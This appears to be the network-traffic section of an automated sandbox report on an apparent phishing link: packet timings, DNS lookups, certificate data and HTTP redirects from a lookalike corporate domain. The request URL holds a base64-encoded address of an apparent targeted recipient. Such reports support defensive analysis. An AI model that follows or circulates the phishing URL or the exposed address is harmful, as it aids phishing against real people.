                                                                                                                                                                                                                      Mar 21, 2025 15:29:24.460822105 CET49442443192.168.11.12104.21.59.250
                                                                                                                                                                                                                      Mar 21, 2025 15:29:24.460911989 CET49442443192.168.11.12104.21.59.250
                                                                                                                                                                                                                      Mar 21, 2025 15:29:24.462472916 CET49442443192.168.11.12104.21.59.250
                                                                                                                                                                                                                      Mar 21, 2025 15:29:24.462487936 CET44349442104.21.59.250192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:24.468388081 CET49445443192.168.11.12104.21.59.250
                                                                                                                                                                                                                      Mar 21, 2025 15:29:24.468411922 CET44349445104.21.59.250192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:24.469026089 CET49445443192.168.11.12104.21.59.250
                                                                                                                                                                                                                      Mar 21, 2025 15:29:24.469638109 CET49445443192.168.11.12104.21.59.250
                                                                                                                                                                                                                      Mar 21, 2025 15:29:24.469650030 CET44349445104.21.59.250192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:24.739695072 CET44349445104.21.59.250192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:24.740923882 CET49445443192.168.11.12104.21.59.250
                                                                                                                                                                                                                      Mar 21, 2025 15:29:24.741751909 CET49445443192.168.11.12104.21.59.250
                                                                                                                                                                                                                      Mar 21, 2025 15:29:24.741761923 CET44349445104.21.59.250192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:24.743004084 CET49445443192.168.11.12104.21.59.250
                                                                                                                                                                                                                      Mar 21, 2025 15:29:24.743014097 CET44349445104.21.59.250192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:25.054544926 CET44349445104.21.59.250192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:25.054622889 CET44349445104.21.59.250192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:25.055655956 CET49445443192.168.11.12104.21.59.250
                                                                                                                                                                                                                      Mar 21, 2025 15:29:25.055655956 CET49445443192.168.11.12104.21.59.250
                                                                                                                                                                                                                      Mar 21, 2025 15:29:25.056655884 CET49445443192.168.11.12104.21.59.250
                                                                                                                                                                                                                      Mar 21, 2025 15:29:25.056670904 CET44349445104.21.59.250192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:25.057049036 CET49445443192.168.11.12104.21.59.250
                                                                                                                                                                                                                      Mar 21, 2025 15:29:25.057061911 CET44349445104.21.59.250192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:25.061466932 CET49446443192.168.11.12104.21.59.250
                                                                                                                                                                                                                      Mar 21, 2025 15:29:25.061491966 CET44349446104.21.59.250192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:25.062128067 CET49446443192.168.11.12104.21.59.250
                                                                                                                                                                                                                      Mar 21, 2025 15:29:25.062628984 CET49446443192.168.11.12104.21.59.250
                                                                                                                                                                                                                      Mar 21, 2025 15:29:25.062645912 CET44349446104.21.59.250192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:25.327321053 CET44349446104.21.59.250192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:25.329087019 CET49446443192.168.11.12104.21.59.250
                                                                                                                                                                                                                      Mar 21, 2025 15:29:25.329802036 CET49446443192.168.11.12104.21.59.250
                                                                                                                                                                                                                      Mar 21, 2025 15:29:25.329837084 CET44349446104.21.59.250192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:25.331078053 CET49446443192.168.11.12104.21.59.250
                                                                                                                                                                                                                      Mar 21, 2025 15:29:25.331090927 CET44349446104.21.59.250192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:25.644813061 CET44349446104.21.59.250192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:25.644898891 CET44349446104.21.59.250192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:25.645730972 CET49446443192.168.11.12104.21.59.250
                                                                                                                                                                                                                      Mar 21, 2025 15:29:25.645788908 CET49446443192.168.11.12104.21.59.250
                                                                                                                                                                                                                      Mar 21, 2025 15:29:25.647624016 CET49446443192.168.11.12104.21.59.250
                                                                                                                                                                                                                      Mar 21, 2025 15:29:25.647639036 CET44349446104.21.59.250192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:34.512290955 CET49474443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:34.512331009 CET44349474151.101.3.6192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:34.512964964 CET49474443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:34.517882109 CET49474443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:34.517901897 CET44349474151.101.3.6192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:34.757520914 CET44349474151.101.3.6192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:34.758588076 CET49474443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:34.758806944 CET49474443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:34.790642977 CET49474443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:34.790755987 CET44349474151.101.3.6192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:34.790950060 CET44349474151.101.3.6192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:34.791379929 CET49474443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:34.791554928 CET49474443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:34.833000898 CET49475443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:34.833054066 CET44349475151.101.3.6192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:34.833794117 CET49475443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:34.834578991 CET49475443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:34.834619999 CET44349475151.101.3.6192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:35.074668884 CET44349475151.101.3.6192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:35.076900005 CET49475443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:35.076945066 CET49475443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:35.090229034 CET49475443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:35.090399027 CET44349475151.101.3.6192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:35.090770960 CET44349475151.101.3.6192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:35.090909004 CET49475443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:35.091252089 CET49475443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:36.204066992 CET49479443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:36.204176903 CET44349479151.101.3.6192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:36.204902887 CET49479443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:36.206155062 CET49479443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:36.206224918 CET44349479151.101.3.6192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:36.449068069 CET44349479151.101.3.6192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:36.450023890 CET49479443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:36.450083017 CET49479443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:36.458156109 CET49479443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:36.458378077 CET44349479151.101.3.6192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:36.458811998 CET44349479151.101.3.6192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:36.459136009 CET49479443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:36.459613085 CET49479443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:49.246875048 CET49483443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:49.246965885 CET44349483151.101.3.6192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:49.247561932 CET49483443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:49.248317957 CET49483443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:49.248372078 CET44349483151.101.3.6192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:49.490746021 CET44349483151.101.3.6192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:49.492981911 CET49483443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:49.493226051 CET49483443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:49.499960899 CET49483443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:49.500212908 CET44349483151.101.3.6192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:49.500688076 CET44349483151.101.3.6192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:49.500853062 CET49483443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:49.501106977 CET49483443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:49.511954069 CET49484443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:49.512067080 CET44349484151.101.3.6192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:49.512753963 CET49484443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:49.513421059 CET49484443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:49.513489962 CET44349484151.101.3.6192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:49.755259037 CET44349484151.101.3.6192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:49.757242918 CET49484443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:49.757242918 CET49484443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:49.763320923 CET49484443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:49.763540030 CET44349484151.101.3.6192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:49.764014959 CET44349484151.101.3.6192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:49.764112949 CET49484443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:49.764462948 CET49484443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:49.782202959 CET49485443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:49.782318115 CET44349485151.101.3.6192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:49.782897949 CET49485443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:49.783628941 CET49485443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:49.783685923 CET44349485151.101.3.6192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:50.021835089 CET44349485151.101.3.6192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:50.023638010 CET49485443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:50.023796082 CET49485443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:50.029776096 CET49485443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:50.030031919 CET44349485151.101.3.6192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:50.030531883 CET44349485151.101.3.6192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:50.030677080 CET49485443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:50.031150103 CET49485443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:50.041871071 CET49486443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:50.041982889 CET44349486151.101.3.6192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:50.042589903 CET49486443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:50.043334961 CET49486443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:50.043389082 CET44349486151.101.3.6192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:50.279598951 CET44349486151.101.3.6192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:50.280376911 CET49486443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:50.280376911 CET49486443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:50.331748009 CET4934580192.168.11.1223.44.104.237
                                                                                                                                                                                                                      Mar 21, 2025 15:29:50.335627079 CET49486443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:50.335762024 CET44349486151.101.3.6192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:50.335963011 CET44349486151.101.3.6192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:50.336697102 CET49486443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:50.336724043 CET49486443192.168.11.12151.101.3.6
                                                                                                                                                                                                                      Mar 21, 2025 15:29:50.445607901 CET804934523.44.104.237192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:50.446283102 CET4934580192.168.11.1223.44.104.237
                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                      Mar 21, 2025 15:28:59.485200882 CET5631453192.168.11.121.1.1.1
                                                                                                                                                                                                                      Mar 21, 2025 15:28:59.621790886 CET53563141.1.1.1192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:05.105070114 CET6103153192.168.11.121.1.1.1
                                                                                                                                                                                                                      Mar 21, 2025 15:29:05.107017040 CET5210553192.168.11.121.1.1.1
                                                                                                                                                                                                                      Mar 21, 2025 15:29:05.107984066 CET5931053192.168.11.121.1.1.1
                                                                                                                                                                                                                      Mar 21, 2025 15:29:05.108963013 CET5935153192.168.11.121.1.1.1
                                                                                                                                                                                                                      Mar 21, 2025 15:29:05.220264912 CET53610311.1.1.1192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:05.221801996 CET53521051.1.1.1192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:05.224505901 CET53593101.1.1.1192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:05.228039980 CET53593511.1.1.1192.168.11.12
                                                                                                                                                                                                                      Mar 21, 2025 15:29:17.761569023 CET53567981.1.1.1192.168.11.12
                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                      Mar 21, 2025 15:28:59.485200882 CET192.168.11.121.1.1.10xa99bStandard query (0)newscorp.wtranovations.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Mar 21, 2025 15:29:05.105070114 CET192.168.11.121.1.1.10x206dStandard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Mar 21, 2025 15:29:05.107017040 CET192.168.11.121.1.1.10x28f8Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Mar 21, 2025 15:29:05.107984066 CET192.168.11.121.1.1.10x43bdStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Mar 21, 2025 15:29:05.108963013 CET192.168.11.121.1.1.10x26c9Standard query (0)cdn4.iconfinder.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                      Mar 21, 2025 15:28:59.621790886 CET1.1.1.1192.168.11.120xa99bNo error (0)newscorp.wtranovations.com104.21.59.250A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Mar 21, 2025 15:28:59.621790886 CET1.1.1.1192.168.11.120xa99bNo error (0)newscorp.wtranovations.com172.67.186.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Mar 21, 2025 15:29:05.220264912 CET1.1.1.1192.168.11.120x206dNo error (0)cdn.jsdelivr.netjsdelivr.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Mar 21, 2025 15:29:05.220264912 CET1.1.1.1192.168.11.120x206dNo error (0)jsdelivr.map.fastly.net151.101.1.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Mar 21, 2025 15:29:05.220264912 CET1.1.1.1192.168.11.120x206dNo error (0)jsdelivr.map.fastly.net151.101.193.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Mar 21, 2025 15:29:05.220264912 CET1.1.1.1192.168.11.120x206dNo error (0)jsdelivr.map.fastly.net151.101.65.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Mar 21, 2025 15:29:05.220264912 CET1.1.1.1192.168.11.120x206dNo error (0)jsdelivr.map.fastly.net151.101.129.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Mar 21, 2025 15:29:05.221801996 CET1.1.1.1192.168.11.120x28f8No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Mar 21, 2025 15:29:05.221801996 CET1.1.1.1192.168.11.120x28f8No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Mar 21, 2025 15:29:05.224505901 CET1.1.1.1192.168.11.120x43bdNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Mar 21, 2025 15:29:05.224505901 CET1.1.1.1192.168.11.120x43bdNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Mar 21, 2025 15:29:05.228039980 CET1.1.1.1192.168.11.120x26c9No error (0)cdn4.iconfinder.com172.66.42.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Mar 21, 2025 15:29:05.228039980 CET1.1.1.1192.168.11.120x26c9No error (0)cdn4.iconfinder.com172.66.41.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      • newscorp.wtranovations.com
                                                                                                                                                                                                                        • cdn.jsdelivr.net
                                                                                                                                                                                                                        • challenges.cloudflare.com
                                                                                                                                                                                                                        • cdnjs.cloudflare.com
                                                                                                                                                                                                                        • cdn4.iconfinder.com
                                                                                                                                                                                                                      TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                                                      Mar 21, 2025 15:28:53.020323038 CET151.101.195.6443192.168.11.1249352CN=bag.itunes.apple.com, O=Apple Inc., L=Cupertino, ST=California, C=US, SERIALNUMBER=C0806592, OID.1.3.6.1.4.1.311.60.2.1.2=California, OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.2.5.4.15=Private Organization CN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=USCN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue Feb 04 19:54:22 CET 2025 Wed Apr 29 14:54:50 CEST 2020Tue Nov 18 20:40:14 CET 2025 Thu Apr 11 01:59:59 CEST 2030771,49196-49195-49188-49187-49162-49161-52393-49200-49199-49192-49191-49172-49171-52392-157-156-61-60-53-47-49160-49170-10,65281-0-23-13-5-13172-18-16-11-10,29-23-24-25,05c118da645babe52f060d0754256a73c
                                                                                                                                                                                                                      CN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=USCN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Apr 29 14:54:50 CEST 2020Thu Apr 11 01:59:59 CEST 2030
                                                                                                                                                                                                                      Mar 21, 2025 15:28:53.269207001 CET151.101.195.6443192.168.11.1249353CN=bag.itunes.apple.com, O=Apple Inc., L=Cupertino, ST=California, C=US, SERIALNUMBER=C0806592, OID.1.3.6.1.4.1.311.60.2.1.2=California, OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.2.5.4.15=Private Organization CN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=USCN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue Feb 04 19:54:22 CET 2025 Wed Apr 29 14:54:50 CEST 2020Tue Nov 18 20:40:14 CET 2025 Thu Apr 11 01:59:59 CEST 2030771,49196-49195-49188-49187-49162-49161-52393-49200-49199-49192-49191-49172-49171-52392-157-156-61-60-53-47-49160-49170-10,65281-0-23-13-5-13172-18-16-11-10,29-23-24-25,05c118da645babe52f060d0754256a73c
                                                                                                                                                                                                                      CN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=USCN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Apr 29 14:54:50 CEST 2020Thu Apr 11 01:59:59 CEST 2030
                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      0192.168.11.1249369104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:28:59 UTC498OUTGET /edzxesfee/d205afd3/?0pcb7=dHRob3JwZUBuZXdzY29ycC5jb20=__;!!F0Stn7g!E0yRpQQMM0NAZFe0WZgVZoU9UW-O8fAzEbpBRs9Nx6gsHTBN5bkxYcJeSQF_jMoSh7a26p6PazhhZgHyEsclklDH$ HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      2025-03-21 14:29:00 UTC1310INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:00 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=3600
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:00 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/edzxesfee/d205afd3/?0pcb7=dHRob3JwZUBuZXdzY29ycC5jb20=__;!!F0Stn7g!E0yRpQQMM0NAZFe0WZgVZoU9UW-O8fAzEbpBRs9Nx6gsHTBN5bkxYcJeSQF_jMoSh7a26p6PazhhZgHyEsclklDH$
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a5lZfNZDbmZUS87%2Fo8eh%2B7%2FeNfxCJMtwlHOQAQv%2BVrx6LrYuUe%2Fm7774jASE0WvuQo6Ipb5K7rKsY9RDObEevLvE4c1z%2FgZ4EKiVVM8FMYIW6Z8bOMFsIPYawepnH8D1M789%2BItw6EUkjlPJbg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=53&min_rtt=53&rtt_var=26&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=693&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e2393e8963710-MIA
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=134134&min_rtt=134004&rtt_var=28463&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1076&delivery_rate=30043&cwnd=252&unsent_bytes=0&cid=5af83355058068c8&ts=356&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:00 UTC59INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></hea
                                                                                                                                                                                                                      2025-03-21 14:29:00 UTC114INData Raw: 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: d><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      1192.168.11.1249371104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:00 UTC498OUTGET /edzxesfee/d205afd3/?0pcb7=dHRob3JwZUBuZXdzY29ycC5jb20=__;!!F0Stn7g!E0yRpQQMM0NAZFe0WZgVZoU9UW-O8fAzEbpBRs9Nx6gsHTBN5bkxYcJeSQF_jMoSh7a26p6PazhhZgHyEsclklDH$ HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      2025-03-21 14:29:00 UTC1298INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:00 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=3600
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:00 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/edzxesfee/d205afd3/?0pcb7=dHRob3JwZUBuZXdzY29ycC5jb20=__;!!F0Stn7g!E0yRpQQMM0NAZFe0WZgVZoU9UW-O8fAzEbpBRs9Nx6gsHTBN5bkxYcJeSQF_jMoSh7a26p6PazhhZgHyEsclklDH$
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8sZ08h4oG8zMbZ9SOGFaOhmMfy6MlAEjkvUdSFNmqCETqXyrUGhmYRQbdVBCU3ugTzfNnwMKvUj9icE9owXjhGdEemr5RqVl3caIVUaKKKd3nOvIZ8LkdQ12BOcX8I4mbqTmf654GnSFCd%2BG7g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=51&min_rtt=51&rtt_var=25&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=693&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
